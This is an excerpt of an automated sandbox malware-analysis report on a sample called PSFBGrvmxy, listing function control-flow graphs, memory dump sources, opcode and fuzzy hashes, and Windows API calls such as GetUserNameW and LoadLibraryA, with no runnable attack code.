69fbd28-69fbd39 1504->1513 1505->1504 1514 69fbd75-69fbd7f 1506->1514 1515 69fbd80-69fbd83 1506->1515 1518 69fbce8-69fbceb 1507->1518 1516 69fbc2b-69fbc2e 1511->1516 1517 69fbc20-69fbc26 1511->1517 1512->1511 1520 69fbdab-69fbdae 1515->1520 1521 69fbd85 1515->1521 1522 69fbc69-69fbc6c 1516->1522 1523 69fbc30-69fbc64 1516->1523 1517->1516 1518->1473 1518->1488 1519->1493 1524 69fbdc5-69fbdc8 1520->1524 1525 69fbdb0-69fbdbe 1520->1525 1530 69fbd8f-69fbda6 1521->1530 1533 69fbc6e-69fbc73 1522->1533 1534 69fbc76-69fbc79 1522->1534 1523->1522 1531 69fbdeb-69fbded 1524->1531 1532 69fbdca-69fbde6 1524->1532 1544 69fbdfd-69fbe2a 1525->1544 1547 69fbdc0 1525->1547 1530->1520 1537 69fbdef 1531->1537 1538 69fbdf4-69fbdf7 1531->1538 1532->1531 1533->1534 1535 69fbc7b-69fbc9b 1534->1535 1536 69fbca0-69fbca3 1534->1536 1535->1536 1545 69fbca5-69fbcc7 1536->1545 1546 69fbcd2-69fbcd5 1536->1546 1537->1538 1538->1506 1538->1544 1570 69fbfb7-69fbfbc 1544->1570 1571 69fbe30-69fbe52 1544->1571 1545->1479 1568 69fbccd 1545->1568 1546->1500 1546->1518 1547->1524 1568->1546 1577 69fbfc1-69fbfcb 1570->1577 1576 69fbe58-69fbe61 1571->1576 1571->1577 1576->1570 1579 69fbe67-69fbe6f 1576->1579 1580 69fbe75-69fbe8e 1579->1580 1581 69fbfa3-69fbfaf 1579->1581 1588 69fbf99-69fbf9e 1580->1588 1589 69fbe94-69fbec0 1580->1589 1581->1576 1582 69fbfb5 1581->1582 1582->1577 1588->1581 1589->1588 1606 69fbec6-69fbeee 1589->1606 1599 69fb99c-69fba7e 1593->1599 1600 69fb986-69fb98c 1593->1600 1602 69fbaaa 1594->1602 1603 69fbab2 1594->1603 1599->1593 1599->1594 1604 69fb98e 1600->1604 1605 69fb990-69fb992 1600->1605 1602->1603 1608 69fbab3 1603->1608 1604->1599 1605->1599 1606->1588 1612 69fbef4-69fbf0e 1606->1612 1608->1608 1612->1588 1616 69fbf14-69fbf30 1612->1616 1616->1588 1622 69fbf32-69fbf51 1616->1622 1622->1588 1627 69fbf53-69fbf97 1622->1627 1627->1581
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.655976723.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_69f0000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4e21e5f46636e03873b697bf789ac61f1a43d925184df2e015acf2f7166b41b6
                                                                                        • Instruction ID: 9602778d31a9a38c70daacd54a34e0d295a7efd1a4903d746b7e6b2d34af535a
                                                                                        • Opcode Fuzzy Hash: 4e21e5f46636e03873b697bf789ac61f1a43d925184df2e015acf2f7166b41b6
                                                                                        • Instruction Fuzzy Hash: 6922D170B201058FDB94EF68C494A6EB7E6EF88314F228869E60ADB755DF35DC41CB81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 058AF4E8 Relevance: .4, Instructions: 396COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1647 58af4e8-58af54b 1649 58af57a-58af598 1647->1649 1650 58af54d-58af577 1647->1650 1655 58af59a-58af59c 1649->1655 1656 58af5a1-58af5d8 1649->1656 1650->1649 1657 58afa5a-58afa6f 1655->1657 1660 58afa09 1656->1660 1661 58af5de-58af5f2 1656->1661 1664 58afa0e-58afa24 1660->1664 1662 58af621-58af640 1661->1662 1663 58af5f4-58af61e 1661->1663 1670 58af658-58af65a 1662->1670 1671 58af642-58af648 1662->1671 1663->1662 1664->1657 1675 58af679-58af682 1670->1675 1676 58af65c-58af674 1670->1676 1673 58af64a 1671->1673 1674 58af64c-58af64e 1671->1674 1673->1670 1674->1670 1677 58af68a-58af691 1675->1677 1676->1664 1678 58af69b-58af6a2 1677->1678 1679 58af693-58af699 1677->1679 1681 58af6ac 1678->1681 1682 58af6a4-58af6aa 1678->1682 1680 58af6af-58af6c3 1679->1680 1753 58af6c5 call 58afaa8 1680->1753 1754 58af6c5 call 58afab0 1680->1754 1681->1680 1682->1680 1683 58af6ca-58af6cc 1684 58af6d2-58af6d9 1683->1684 1685 58af821-58af825 1683->1685 1684->1660 1686 58af6df-58af71c 1684->1686 1687 58af82b-58af82f 1685->1687 1688 58af9f4-58afa07 1685->1688 1696 58af9ea-58af9ee 1686->1696 1697 58af722-58af727 1686->1697 1689 58af849-58af852 1687->1689 1690 58af831-58af844 1687->1690 1688->1664 1691 58af881-58af888 1689->1691 1692 58af854-58af87e 1689->1692 1690->1664 1694 58af88e-58af895 1691->1694 1695 58af927-58af93c 1691->1695 1692->1691 1699 58af897-58af8c1 1694->1699 1700 58af8c4-58af8e6 1694->1700 1695->1696 1707 58af942-58af944 1695->1707 1696->1677 1696->1688 1701 58af759-58af76c 1697->1701 1702 58af729-58af737 1697->1702 1699->1700 1700->1695 1730 58af8e8-58af8f2 1700->1730 1705 58af773-58af777 1701->1705 1702->1701 1710 58af739-58af757 1702->1710 1711 58af7e8-58af7f5 1705->1711 1712 58af779-58af78b call 58a4288 1705->1712 1713 58af991-58af9ae 1707->1713 1714 58af946-58af97f 1707->1714 1710->1705 1711->1696 1726 58af7fb-58af805 1711->1726 1734 58af7cb-58af7e3 1712->1734 1735 58af78d-58af7bd 1712->1735 1713->1696 1725 58af9b0-58af9dc 1713->1725 1728 58af988-58af98f 1714->1728 1729 58af981-58af987 1714->1729 1737 58af9de 1725->1737 1738 58af9e3 1725->1738 1739 58af807-58af80f 1726->1739 1740 58af814-58af81c 1726->1740 1728->1696 1729->1728 1742 58af90a-58af925 1730->1742 1743 58af8f4-58af8fa 1730->1743 1734->1664 1749 58af7bf 1735->1749 1750 58af7c4 1735->1750 1737->1738 1738->1696 1739->1696 1740->1696 1742->1695 1742->1730 1747 58af8fe-58af900 1743->1747 1748 58af8fc 1743->1748 1747->1742 1748->1742 1749->1750 1750->1734 1753->1683 1754->1683
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.652025547.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_58a0000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: cc616a0898ff82da8e349e283dc909fa8d829943f6dd75a7c609d91c27ccbe0a
                                                                                        • Instruction ID: ba475f2e4a9db82434565311b3fc1262c53f04cd487ae1791287afe9be119427
                                                                                        • Opcode Fuzzy Hash: cc616a0898ff82da8e349e283dc909fa8d829943f6dd75a7c609d91c27ccbe0a
                                                                                        • Instruction Fuzzy Hash: A5F14D35A00209DFEB14DFA9C944BADBBF2BF88304F158169E905EB265DB74ED45CB80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C4C978 Relevance: .3, Instructions: 339COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.619503556.0000000002C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_2c40000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 41176b2e18bc28318c2339d13f2a4816ca6ca79cd8e80d33606023fc50b876f0
                                                                                        • Instruction ID: f434af33f717067d857a935681ee44a8fd06f1463b7dfd36fcf0156e8d385a49
                                                                                        • Opcode Fuzzy Hash: 41176b2e18bc28318c2339d13f2a4816ca6ca79cd8e80d33606023fc50b876f0
                                                                                        • Instruction Fuzzy Hash: A1D12E75E002099FCB14DFA8D484AAEFBF1FF88314F14856AD515AB361DB34EA46CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C4A9B8 Relevance: .3, Instructions: 266COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.619503556.0000000002C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_2c40000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 17bde18fe52ba48a89f325c232d956eedf4aa2e59a637433c0782240503afc49
                                                                                        • Instruction ID: 7c5483f90bb79e9e585c9e83f4ee616922a3b2d05350e875266eaf8201cfd42c
                                                                                        • Opcode Fuzzy Hash: 17bde18fe52ba48a89f325c232d956eedf4aa2e59a637433c0782240503afc49
                                                                                        • Instruction Fuzzy Hash: 88B17C70E40609CFDF14CFA9C9957AEBBF2AF88714F148129E815E7294EB749981CF81
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C49DA0 Relevance: .2, Instructions: 238COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.619503556.0000000002C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_2c40000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 107f03fa2875cd0fb0e39985dd8e6be10f00d8caa87ae174e5c933f4bc66620a
                                                                                        • Instruction ID: 8c7d95e5b5d9a46f1a2200318ab9ba30eb272854301071056713ede33167c020
                                                                                        • Opcode Fuzzy Hash: 107f03fa2875cd0fb0e39985dd8e6be10f00d8caa87ae174e5c933f4bc66620a
                                                                                        • Instruction Fuzzy Hash: 5D918CB0E00219DFDF14CFA9C9947EFBBF2AF88714F148129E419A7294EB349941CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 069FEC38 Relevance: 1.6, APIs: 1, Instructions: 146COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.655976723.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_69f0000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f6f16733d1da02d17bc82ac29f83d6b0dc8904ce02044919284dc929c27a1fff
                                                                                        • Instruction ID: 137bf76e7f913db0741e21bf5ed4dd7ff2476c9f1481e8a65921d77a039c47a9
                                                                                        • Opcode Fuzzy Hash: f6f16733d1da02d17bc82ac29f83d6b0dc8904ce02044919284dc929c27a1fff
                                                                                        • Instruction Fuzzy Hash: CF415771D143559FCB10CF69C8102EEBFB5AF89310F25826BE605E7A50DB349844CBE0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C4F6C4 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 34 2c4f6c4-2c4f72f 35 2c4f731-2c4f75c 34->35 36 2c4f79a-2c4f79e 34->36 45 2c4f78c 35->45 46 2c4f75e-2c4f760 35->46 37 2c4f7a0-2c4f7c3 36->37 38 2c4f7c9-2c4f7d4 36->38 37->38 39 2c4f7d6-2c4f7de 38->39 40 2c4f7e0-2c4f81b GetUserNameW 38->40 39->40 43 2c4f824-2c4f83a 40->43 44 2c4f81d-2c4f823 40->44 50 2c4f850-2c4f877 43->50 51 2c4f83c-2c4f848 43->51 44->43 49 2c4f791-2c4f794 45->49 47 2c4f782-2c4f78a 46->47 48 2c4f762-2c4f76c 46->48 47->49 54 2c4f770-2c4f77e 48->54 55 2c4f76e 48->55 49->36 57 2c4f887 50->57 58 2c4f879-2c4f87d 50->58 51->50 54->54 59 2c4f780 54->59 55->54 62 2c4f888 57->62 58->57 61 2c4f87f 58->61 59->47 61->57 62->62
                                                                                        APIs
                                                                                        • GetUserNameW.ADVAPI32(00000000,00000000), ref: 02C4F80B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.619503556.0000000002C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_2c40000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID: NameUser
                                                                                        • String ID:
                                                                                        • API String ID: 2645101109-0
                                                                                        • Opcode ID: 2aaaa8b23ae36bba09ef7360869e02c2260515fc47cba9fc8c1ea034ebadddd7
                                                                                        • Instruction ID: b3ff31ea56edca78670a944f1717d7cada3d03a45ba335f0b9addbd5682c89ee
                                                                                        • Opcode Fuzzy Hash: 2aaaa8b23ae36bba09ef7360869e02c2260515fc47cba9fc8c1ea034ebadddd7
                                                                                        • Instruction Fuzzy Hash: 055114B4D002188FDB18CFA9D888B9EBBB1BF48314F15812ED815BB751DB78A844CF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C475E5 Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 112 2c475e5-2c47647 114 2c47649-2c4766e 112->114 115 2c4769b-2c476e7 LoadLibraryA 112->115 114->115 120 2c47670-2c47672 114->120 118 2c476f0-2c47721 115->118 119 2c476e9-2c476ef 115->119 125 2c47731 118->125 126 2c47723-2c47727 118->126 119->118 122 2c47674-2c4767e 120->122 123 2c47695-2c47698 120->123 127 2c47680 122->127 128 2c47682-2c47691 122->128 123->115 131 2c47732 125->131 126->125 130 2c47729 126->130 127->128 128->128 129 2c47693 128->129 129->123 130->125 131->131
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNELBASE(?), ref: 02C476D7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.619503556.0000000002C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_2c40000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: d5214651e806d6eb76e84a72ef35a3243ac620b171dfeb3c3d5f10b03e79cd97
                                                                                        • Instruction ID: 6dd56c9e3ec928ba0bf933de087930b705800f182b310fb7bd27c94756c974fc
                                                                                        • Opcode Fuzzy Hash: d5214651e806d6eb76e84a72ef35a3243ac620b171dfeb3c3d5f10b03e79cd97
                                                                                        • Instruction Fuzzy Hash: A64136B1D106198FDB10CFA9C9847DEFBF6EB48314F10852AE815AB344DB749849CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 02C44954 Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 92 2c44954-2c47647 94 2c47649-2c4766e 92->94 95 2c4769b-2c476e7 LoadLibraryA 92->95 94->95 100 2c47670-2c47672 94->100 98 2c476f0-2c47721 95->98 99 2c476e9-2c476ef 95->99 105 2c47731 98->105 106 2c47723-2c47727 98->106 99->98 102 2c47674-2c4767e 100->102 103 2c47695-2c47698 100->103 107 2c47680 102->107 108 2c47682-2c47691 102->108 103->95 111 2c47732 105->111 106->105 110 2c47729 106->110 107->108 108->108 109 2c47693 108->109 109->103 110->105 111->111
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNELBASE(?), ref: 02C476D7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.619503556.0000000002C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_2c40000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: 0a26b97cd2d7be6ae022ef6fa0d725cd1387d8f2f54639bfa1320cbfa9414ba9
                                                                                        • Instruction ID: ae077d5eca0f8cccf17f3072dd7c9ed5d94b86131ceb0e4a45863d1360fa4d86
                                                                                        • Opcode Fuzzy Hash: 0a26b97cd2d7be6ae022ef6fa0d725cd1387d8f2f54639bfa1320cbfa9414ba9
                                                                                        • Instruction Fuzzy Hash: 3D4127B1D006198FDB10CFA9C9847DEFBF6EB48314F148529E815AB384DB749849CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 058AFAA8 Relevance: 1.6, APIs: 1, Instructions: 57windowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 752 58afaa8-58afb25 PeekMessageW 754 58afb2e-58afb4f 752->754 755 58afb27-58afb2d 752->755 755->754
                                                                                        APIs
                                                                                        • PeekMessageW.USER32(?,?,?,?,?), ref: 058AFB18
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.652025547.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_58a0000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePeek
                                                                                        • String ID:
                                                                                        • API String ID: 2222842502-0
                                                                                        • Opcode ID: d921913f6cf716beb471ba625b040d077f91b512c00e0794201bcf2113c70f95
                                                                                        • Instruction ID: 57e84912e7972d3c22c227bcb806cebe4b0eccc946efa64cb8b4c7af5d18a256
                                                                                        • Opcode Fuzzy Hash: d921913f6cf716beb471ba625b040d077f91b512c00e0794201bcf2113c70f95
                                                                                        • Instruction Fuzzy Hash: DF212CB68002099FDB10DF9AD944BDEFBF8FF48320F10841AE955A3210C378A545DFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 058AFAB0 Relevance: 1.6, APIs: 1, Instructions: 52windowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 757 58afab0-58afb25 PeekMessageW 758 58afb2e-58afb4f 757->758 759 58afb27-58afb2d 757->759 759->758
                                                                                        APIs
                                                                                        • PeekMessageW.USER32(?,?,?,?,?), ref: 058AFB18
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.652025547.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_58a0000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessagePeek
                                                                                        • String ID:
                                                                                        • API String ID: 2222842502-0
                                                                                        • Opcode ID: 51ed88818aa160e19e855de6f7ae8ee7b150c3264969ffa53a6a3a11870b5911
                                                                                        • Instruction ID: baac85138ca2cdc3d00315880ccaba4c7c2a0ace9b52a87bd97d171dd79cf2ac
                                                                                        • Opcode Fuzzy Hash: 51ed88818aa160e19e855de6f7ae8ee7b150c3264969ffa53a6a3a11870b5911
                                                                                        • Instruction Fuzzy Hash: 7E1107B6C002099FDB10CF9AD584BDEFBF8FB48324F10842AE955A3650C378A945DFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 069FED20 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 761 69fed20-69fed5e 762 69fed66-69fed94 GlobalMemoryStatusEx 761->762 763 69fed9d-69fedc5 762->763 764 69fed96-69fed9c 762->764 764->763
                                                                                        APIs
                                                                                        • GlobalMemoryStatusEx.KERNELBASE ref: 069FED87
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.655976723.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_69f0000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID: GlobalMemoryStatus
                                                                                        • String ID:
                                                                                        • API String ID: 1890195054-0
                                                                                        • Opcode ID: 930da75697ab8632a403357bcdd5e92a51f3a67bf09b0ccf227f679e28e7c958
                                                                                        • Instruction ID: 14ba21e89af58bf7fc9f66cd2179cdb98e3430ec8b479040a948ae4e8585c7a4
                                                                                        • Opcode Fuzzy Hash: 930da75697ab8632a403357bcdd5e92a51f3a67bf09b0ccf227f679e28e7c958
                                                                                        • Instruction Fuzzy Hash: 021112B1C006199BCB10DF9AC444BDEFBF8AF48324F15816AD918B7640D378A944CFE1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012FD3EC Relevance: .1, Instructions: 75COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.618253914.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_12fd000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9a4598b411b545373d393e085454bcded84a3e5665041c8073bda6444035c116
                                                                                        • Instruction ID: f4edcdd610e5352574ad631f489547af03945d90f6b13805c2422b5f281ec0f2
                                                                                        • Opcode Fuzzy Hash: 9a4598b411b545373d393e085454bcded84a3e5665041c8073bda6444035c116
                                                                                        • Instruction Fuzzy Hash: F3210671510248DFDB01DF98D9C0B66FF65FB84324F24C67DEA090B206C33AE446C6A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012FD4D8 Relevance: .1, Instructions: 75COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.618253914.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_12fd000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4464df1ff38c719dbefb3dd528741fb9eda8353db4756a8deda258d47de45e3e
                                                                                        • Instruction ID: bfd10e4cfd1683bca948d80cb33c084c3dd293f7ddc1e6da7cebae5213b82465
                                                                                        • Opcode Fuzzy Hash: 4464df1ff38c719dbefb3dd528741fb9eda8353db4756a8deda258d47de45e3e
                                                                                        • Instruction Fuzzy Hash: A0213A75510248DFDB01CF98E9C4B16FF65FB88328F24857DEA050B206C33AD845CBA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0130D030 Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.618469664.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_130d000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: be3b8f860a55018ac91fda283f9827f76ccff3e5166ac96b9cc159cbc30c6a5b
                                                                                        • Instruction ID: b215986223bf7a7cb046878fc87c8d5570d9201d2a08d2c7439396ef6c161130
                                                                                        • Opcode Fuzzy Hash: be3b8f860a55018ac91fda283f9827f76ccff3e5166ac96b9cc159cbc30c6a5b
                                                                                        • Instruction Fuzzy Hash: EF2125B1504244DFDB12DF98D9D0B26BBE5FB84318F24C56DE84D0B686C33AD846CA61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0130D118 Relevance: .1, Instructions: 71COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.618469664.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_130d000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1456592e56a1f39163a3414e476ffb9615ad64ecd9359f7570bd5bd80a0f428a
                                                                                        • Instruction ID: a8b9b0dfc07a55d6f615a9a2ee6aabfb4d9dc24ed4ade5c1798ab108a1ceca92
                                                                                        • Opcode Fuzzy Hash: 1456592e56a1f39163a3414e476ffb9615ad64ecd9359f7570bd5bd80a0f428a
                                                                                        • Instruction Fuzzy Hash: DA21F571504244DFDB4ADF98C9D0B16BFE5FB84318F20C56DE90A4B682CB3AD846C661
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012FD3E7 Relevance: .1, Instructions: 56COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.618253914.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_12fd000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 592ece47119f67d140ea7e82aae040392f4fe946fa5bf8865279594dce73126f
                                                                                        • Instruction ID: cfbeffa7970ff549f1da5886675d68bfc88921b9bbdd22e67a18d6efcec52126
                                                                                        • Opcode Fuzzy Hash: 592ece47119f67d140ea7e82aae040392f4fe946fa5bf8865279594dce73126f
                                                                                        • Instruction Fuzzy Hash: 1A11CD76404284DFDB02CF44D5C0B56BF62FB84320F24C6A9DA480A616C33AE456CBA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 012FD4D3 Relevance: .1, Instructions: 56COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.618253914.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_12fd000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 592ece47119f67d140ea7e82aae040392f4fe946fa5bf8865279594dce73126f
                                                                                        • Instruction ID: 632fe533c9df2a4afbab80d0f6b974cdecd9e75085e010100765a54f0a6bbde7
                                                                                        • Opcode Fuzzy Hash: 592ece47119f67d140ea7e82aae040392f4fe946fa5bf8865279594dce73126f
                                                                                        • Instruction Fuzzy Hash: C911E176404284CFCB12CF44D5C4B16FF72FB84324F2482ADDA090B616C33AD45ACBA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0130D02B Relevance: .1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.618469664.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_130d000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9987972c5ad5a0bbdfc3a90a2c4a8b6c80251489d692dd004c95719536adb841
                                                                                        • Instruction ID: ca08a9f521f6d6ac90f1e87a4af20c2c0c2fe8d4cf47b3b86fc2633e6e25f990
                                                                                        • Opcode Fuzzy Hash: 9987972c5ad5a0bbdfc3a90a2c4a8b6c80251489d692dd004c95719536adb841
                                                                                        • Instruction Fuzzy Hash: 2F11BE75504280DFDB12CF54D9D0B15BFB1FB84318F28C6AAD8494B696C33AD44ACB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0130D113 Relevance: .1, Instructions: 52COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.618469664.000000000130D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0130D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_3_2_130d000_PSFBGrvmxy.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
